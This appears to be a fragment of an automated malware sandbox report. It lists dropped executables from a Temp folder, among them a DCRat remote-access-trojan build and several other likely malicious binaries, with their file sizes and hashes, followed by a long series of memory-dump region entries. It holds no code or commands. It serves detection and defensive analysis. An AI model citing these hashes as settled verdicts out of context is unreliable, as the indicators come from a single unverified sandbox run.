            48eaa30e381ae23f05ae8ae2c626b1e40f7a3c2b4325f1eee6eedd835c1616ca

            SHA512

            a7f6254e6c696a0916207af27a3099c2150682bd376eb3330e0f1a95839e128a30f465733f8b186321e7ca32221e1ddaf565d827cdab01943087b1ca5d19606b

          • \??\PIPE\srvsvc

            MD5

            d41d8cd98f00b204e9800998ecf8427e

            SHA1

            da39a3ee5e6b4b0d3255bfef95601890afd80709

            SHA256

            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

            SHA512

            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

          • \Users\Admin\AppData\Local\Temp\Files\DCRatBuild8.exe

            Filesize

            2.4MB

            MD5

            6d6d0d8735a51e18174a1bae2d09115c

            SHA1

            62f0dea7509ef394724a3572d17136f66901ed0c

            SHA256

            578ad54194b7c74d3c07f5f7cc2ce27e77cc2d1224a09922e04ef06fc3a295d9

            SHA512

            823895e108a4c75d5e5cc24e322376706234d99e4087874f5ac3893e01e528db328738ec7f5813006f1b27f2851b1a5c650e6c53a9b008ec362187a52fa74a32

          • \Users\Admin\AppData\Local\Temp\Files\SingerJudy.exe

            Filesize

            1.1MB

            MD5

            0e43108aac7bb6e9f68d769b746fea16

            SHA1

            751e7fe585e73d5ab80f5f629c94c170484c12f5

            SHA256

            931a185152c1d316cd2b65998aee88d4f64f4acbe59df3efabb0ff968fa6c993

            SHA512

            faca3f1d87a4bdbacc0396544818a27925800b95e298185eb8ae3580d79f02a7eee7f02564181f453bdb56197539a3659526e1f00881ac0779301d7dbdd60c27

          • \Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe

            Filesize

            65KB

            MD5

            3b5926b1dca859fa1a51a103ab0fd068

            SHA1

            9b41d9e1810454b00e12cc386e8e31fc1bd29ef6

            SHA256

            e1f3e0bc705e2917d285f9a9ab49cc6444ff9267b46cbf1be3b97f9a716e6d08

            SHA512

            6f924f3b1a7bcce36cea2ef0f73dfcf837b2ec03da44e0a12d6afcd2af1a92d20af251d04fd3970beedad082d646fc84ae7107b4111f43abc12b5a1e3d03a794

          • \Users\Admin\AppData\Local\Temp\Files\patcher.exe

            Filesize

            3.1MB

            MD5

            d2e7813509144a52aaa13043a69a47bd

            SHA1

            e37fea7ca629333387899d6a2cc1e623b75cc209

            SHA256

            b36cc9e932421fed1817921a41d4340577a4785f658d8f0e9a2b95ef4444be4f

            SHA512

            dd2b96a49f93f65dd8f0d4d3b1484ed7f36f1c2ebdd63d41cf5a009ce37bb6e1aae8f27420cbb42c500c21655188e3f278a01cbb5e47db147da95f871e570fa7

          • \Users\Admin\AppData\Local\Temp\Files\univ.exe

            Filesize

            320KB

            MD5

            2245fb9cf8f7d806e0ba7a89da969ec2

            SHA1

            c3ab3a50e4082b0f20f6ba0ce27b4d155847570b

            SHA256

            f15fdff76520846b2c01e246d8de9fc24cba9b0162cc0de15e2cf1c24172ee30

            SHA512

            cc1474cfbd9ffc7a4f92773b2f251b9f1ec9813f73a9be9d0241b502dda516b306d463cc7f8003935e74bc44c3964f6af79a7e4bcf12816ac903b88a77a5a111

          • \Users\Admin\AppData\Local\Temp\TraderBro770.exe

            Filesize

            1.4MB

            MD5

            dac3cc50390b225c5d309a87b7e91b59

            SHA1

            d5905b6451ae394f39676d9ea90f05f062e733da

            SHA256

            ded08097483f68502d8dbe467d9f9f4f8b976cdffea71f8b4695c777341de2a2

            SHA512

            3b5fab0fa70f0c7b514ccb7f3a6632d6983a9c772043502dac450e29f8896ba1b5337331037480e7c9b940ca10f6080806a97082674ed725d56fab451558c682

          • \Users\Admin\AppData\Local\Temp\nseE419.tmp\O8UX8I.dll

            Filesize

            6KB

            MD5

            293165db1e46070410b4209519e67494

            SHA1

            777b96a4f74b6c34d43a4e7c7e656757d1c97f01

            SHA256

            49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

            SHA512

            97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

          • memory/384-628-0x0000000000400000-0x0000000000440000-memory.dmp

            Filesize

            256KB

          • memory/1316-232-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

            Filesize

            2.9MB

          • memory/1316-241-0x0000000001F70000-0x0000000001F78000-memory.dmp

            Filesize

            32KB

          • memory/1440-715-0x0000000000090000-0x00000000000A8000-memory.dmp

            Filesize

            96KB

          • memory/1620-161-0x0000000000EB0000-0x0000000000EC6000-memory.dmp

            Filesize

            88KB

          • memory/1756-412-0x0000000000400000-0x0000000000432000-memory.dmp

            Filesize

            200KB

          • memory/1756-410-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

            Filesize

            4KB

          • memory/1756-406-0x0000000000400000-0x0000000000432000-memory.dmp

            Filesize

            200KB

          • memory/1756-404-0x0000000000400000-0x0000000000432000-memory.dmp

            Filesize

            200KB

          • memory/1756-413-0x0000000000400000-0x0000000000432000-memory.dmp

            Filesize

            200KB

          • memory/1908-347-0x0000000074060000-0x000000007474E000-memory.dmp

            Filesize

            6.9MB

          • memory/1908-0-0x000000007406E000-0x000000007406F000-memory.dmp

            Filesize

            4KB

          • memory/1908-2-0x0000000074060000-0x000000007474E000-memory.dmp

            Filesize

            6.9MB

          • memory/1908-1-0x00000000002F0000-0x00000000002F8000-memory.dmp

            Filesize

            32KB

          • memory/2056-465-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-458-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-467-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-466-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-469-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-464-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-463-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-462-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-460-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-459-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-457-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-456-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-455-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-454-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-453-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-452-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-451-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-450-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-449-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-448-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-447-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-445-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-444-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-443-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-442-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-441-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-436-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-468-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-432-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-431-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-430-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-429-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-428-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-427-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-426-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-425-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-424-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-423-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-470-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-416-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-414-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-434-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-446-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-461-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-435-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2056-433-0x0000000000400000-0x0000000000474000-memory.dmp

            Filesize

            464KB

          • memory/2140-382-0x0000000000400000-0x000000000060B000-memory.dmp

            Filesize

            2.0MB

          • memory/2148-339-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

            Filesize

            2.9MB

          • memory/2148-341-0x0000000002970000-0x0000000002978000-memory.dmp

            Filesize

            32KB

          • memory/2172-550-0x00000000009D0000-0x00000000009D8000-memory.dmp

            Filesize

            32KB

          • memory/2172-549-0x0000000019F10000-0x000000001A1F2000-memory.dmp

            Filesize

            2.9MB

          • memory/2228-543-0x0000000002200000-0x0000000002208000-memory.dmp

            Filesize

            32KB

          • memory/2228-538-0x000000001B5B0000-0x000000001B892000-memory.dmp

            Filesize

            2.9MB